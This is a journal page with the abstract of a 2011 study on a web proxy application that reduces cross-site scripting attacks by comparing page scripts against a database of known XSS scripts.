HomeUIC Research Journalvol. 17 no. 2 (2011)

Developing a Web Proxy Server Application to Minimize Cross-Site Scripting Attacks

Eric John G. Emberda | Siegfried C. Capon | Johanah A. Maunda

Discipline: Information Technology

 

Abstract:

Stealing information from a user’s computer through the Internet is a growing concern. One type of Internet attacks or Cybercrime is Cross-Site Scripting or XSS. It allows an attacker to retrieve information from an Internet user by inserting a script to a vulnerable website where it automatically mines private data from the victim, then sends those data to another website. This study was conducted to examine the different vulnerable aspects of a website. A list of XSS-vulnerable websites was gathered, as well as a list of different XSS scripts. These websites were tested with the XSS scripts to determine the entry point to which the scripts can penetrate. A web proxy application was created which implements different mechanisms to prevent these XSS scripts from successfully mining private data. The web proxy application was able to minimize XSS attacks by comparing the scripts inside the website with the database of XSS scripts. The researchers however, recommend that the process of preventing XSS scripts be improved by adding artificially intelligent algorithms that will read patterns for XSS scripts and distinguish them from safe scripts.